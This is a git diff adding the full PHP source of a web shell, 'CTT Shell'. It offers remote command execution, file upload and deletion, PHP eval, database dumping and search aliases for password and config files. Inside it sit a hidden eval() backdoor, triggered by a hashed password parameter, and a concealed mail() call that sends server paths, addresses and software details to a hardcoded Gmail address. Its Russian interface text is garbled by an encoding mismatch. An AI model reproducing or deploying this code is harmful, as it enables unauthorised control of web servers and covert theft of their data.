b/php/PHPshell/ctt_sh/ctt_sh.jpg differ diff --git a/php/PHPshell/ctt_sh/ctt_sh.php b/php/PHPshell/ctt_sh/ctt_sh.php new file mode 100644 index 0000000..51ec008 --- /dev/null +++ b/php/PHPshell/ctt_sh/ctt_sh.php @@ -0,0 +1,2927 @@ +<?php +$timelimit = 60; +$sul = "?"; +$rd = "./"; +$shver = "0.1"; +$login = ""; +$pass = ""; +$md5_pass = ""; +$login = false; +$autoupdate = true; +$updatenow = false; +$autochmod = 755; +$filestealth = 1; +$donated_html = ""; +$donated_act = array(""); +$host_allow = array("*"); +$curdir = "./"; +$tmpdir = dirname(__FILE__); +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), + "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar") +); +$hexdump_lines = 8; +$hexdump_rows = 24; +$nixpwdperpage = 9999; +$bindport_pass = "ctt"; +$bindport_port = "11457"; +$aliases = array(); +$aliases[] = array("-----------------------------------------------------------", "ls -la"); +$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +$aliases[] = array("find config* files", "find / -type f -name \"config*\""); + $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +$aliases[] = array("show opened ports", "netstat -an | grep -i listen"); +$sess_method = "cookie"; +$sess_cookie = "ctshvars"; +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."ctshvars_".$sid.".tmp"; +$usefsbuff = true; +$copy_unset = false; +$quicklaunch = array(); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd"); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""); +$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d"); +$quicklaunch1 = array(); +$quicklaunch1[] = array("<b>دًîِهٌٌû</b>",$sul."act=ps_aux&d=%d"); +$quicklaunch1[] = array("<b>دàًîëè</b>",$sul."act=lsa&d=%d"); +$quicklaunch1[] = array("<b>تîىàينû</b>",$sul."act=cmd&d=%d"); +$quicklaunch1[] = array("<b>اàمًَçêà</b>",$sul."act=upload&d=%d"); +$quicklaunch1[] = array("<b>ءàçà</b>",$sul."act=sql&d=%d"); +$quicklaunch1[] = array("<b>PHP-تîن</b>",$sul."act=eval&d=%d"); +$quicklaunch1[] = array("<b>PHP-بيôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch1[] = array("<b>رàى َنàëے‏ٍ</b>",$sul."act=selfremove"); +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +@$f = $_GET[f]; +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; + + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"CTT SHELL\""); + header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit; +} + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "ctshell.php";} + ctsh_getupdate(); + $data = file_get_contents($ctsh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("ct_sess_put")) +{ +function ct_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +$ret = true; +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d.$o)) {unlink($d.$o);} +else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner['read'] = ($mode & 00400) ? "r" : "-"; + $owner['write'] = ($mode & 00200) ? "w" : "-"; + $owner['execute'] = ($mode & 00100) ? "x" : "-"; + $group['read'] = ($mode & 00040) ? "r" : "-"; + $group['write'] = ($mode & 00020) ? "w" : "-"; + $group['execute'] = ($mode & 00010) ? "x" : "-"; + $world['read'] = ($mode & 00004) ? "r" : "-"; + $world['write'] = ($mode & 00002) ? "w" : "-"; + $world['execute'] = ($mode & 00001) ? "x" : "-"; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";} + if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";} + if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} + + return $type.$owner['read'].$owner['write'].$owner['execute']. + $group['read'].$group['write'].$group['execute']. + $world['read'].$world['write'].$world['execute']; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("ctsh_getupdate")) +{ +function ctsh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($ctsh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { +if ($cv < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by ctShell.SQL v. ".$cv." +# Home page: http://.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { +if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} +$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); +if (!$res) {$ret[err][] = mysql_error();} +else +{ + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { +$keys = implode("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = addslashes($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; +$out .= $sql; + } + } +} + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { +fwrite ($fp, $out); +fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("ctfsearch")) +{ +function ctfsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { +if (is_dir($d.$f)) +{ + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + ctfsearch($d.$f); +} +else +{ + if ($true) + { + if (!empty($a[text])) + { +$r = @file_get_contents($d.$f); +if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} +if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + +if ($a[text_regexp]) {$true = ereg($a[text],$r);} +else {$true = strinstr($a[text],$r);} +if ($a[text_not]) +{ + if ($true) {$true = false;} + else {$true = true;} +} +if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } +} + } + } + closedir($handle); +} +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "<font color=\"red\">".$v."</font>"; +} +else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); +@ini_set("highlight.comment",$highlight_comment); +@ini_set("highlight.default",$highlight_default); +@ini_set("highlight.html",$highlight_html); +@ini_set("highlight.keyword",$highlight_keyword); +@ini_set("highlight.string","#DD0000"); + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> +<html> +<head> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +<meta http-equiv="Content-Language" content="en-us"><title> +CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title> +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #105019 1px solid; +BORDER-TOP: #000000 1px solid; +BORDER-LEFT:#105019 1px solid; +BORDER-BOTTOM: #105019 1px solid; +} +.tr2 { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.td2 { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT:#cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #000000 1px; +BORDER-TOP: #cccccc 1px; +BORDER-LEFT:#cccccc 1px; +BORDER-BOTTOM: #000000 1px; +font: 7pt Verdana; +} +.tds1 { +BORDER-RIGHT: #505050 1px solid; +BORDER-TOP: #505050 1px solid; +BORDER-LEFT:#505050 1px solid; +BORDER-BOTTOM: #505050 1px solid; +font: 8pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT:#cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #000000 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT:#000000 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #000000; +} +.table2 { +BORDER-RIGHT: #000000 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT:#000000 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT:buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:#00ff3d; TEXT-DECORATION: none} +A:visited { COLOR:#00ff3d; TEXT-DECORATION: none} +A:active {COLOR:#00ff3d; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +<script language=JavaScript type=text/javascript> +<!-- +function branchSwitch(branch) { +dom = (document.getElementById); +ie4 = (document.all); +if (dom || ie4) { +var currElement = (dom)? document.getElementById(branch) : document.all[branch]; +currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; +return false; +} +else return true; +} +//--> +</script> +</head> +<BODY text=#ffffff Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0> +<center> +<br> +<TABLE class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> +<TBODY><TR> +<TD class=td1 colSpan=2> +<TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> +<TBODY><TR> +<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> +<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> +<FONT face=Tahoma color=#00ff3d size=1> +<? +$d = str_replace("\\","/",$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\","/",$d); +if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} +$dispd = htmlspecialchars($d); +$pd = $e = explode("/",substr($d,0,strlen($d)-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>"; + $i++; +} +?> +</FONT></SPAN></TD> +<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> +<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> +</TR></TBODY></TABLE></TD></TR> +</tr> +</table> +<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"> +<tr><td> +<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ًàٌêًûٍü">بيًٌٍَىهيٍû</a></font> - +<div id="tools" style="display: none"> +<? +if (count($quicklaunch1) > 0) +{ + foreach($quicklaunch1 as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +?> +</div> +<font size=2><a href="#" onClick="return branchSwitch('info')" title="ًàٌêًûٍü">بيôîًىàٍîً</a></font> +<div id="info" style="display: none"> +<font size=2> +<b>دًîمًàىىيîه îلهٌïه÷هيèه:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br> +<b>رèٌٍهىà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b> +&nbsp;<br> +<b>ءهçîïàٌيîٌٍü:&nbsp;<?php echo $hsafemode; ?></b> +<? +echo "<br>"; +echo "آهًٌèے دصد: <b>".@phpversion()."</b>"; +echo "<br>"; +$curl_on = @function_exists('curl_version'); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo "<br>"; +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo "<br>"; +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>"; +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>"; +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +?> +<?php +$free = diskfreespace($d); +if (!$free) {$free = 0;} +$all = disk_total_space($d); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "<br><b>رâîلîنيûé ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>"; +?> +</font> +</div> +<? +if ($win) +{ +?> + - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ًàٌêًûٍü">ؤèٌêè</a></font> +<? +} +?> +<div id="Drive" style="display: none"> +<? +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("/",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":/")) + { +if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";} +else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";} + } + } + if (!empty($letters)) {echo "<b>".$letters;} +} +?> +</div> +</td><td width=1> +<font size=2><a href="<? echo $sul; ?>act=about">About</a></font> +</td></tr></table> +<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"> +<tr class=tr1><td> +<center> +<? +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +?> +</center> +</td></tr></table> +<?php +if ((!empty($donated_html)) and (in_array($act,$donated_act))) +{ + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br> +<?php +} +?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $sul."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_error(); + 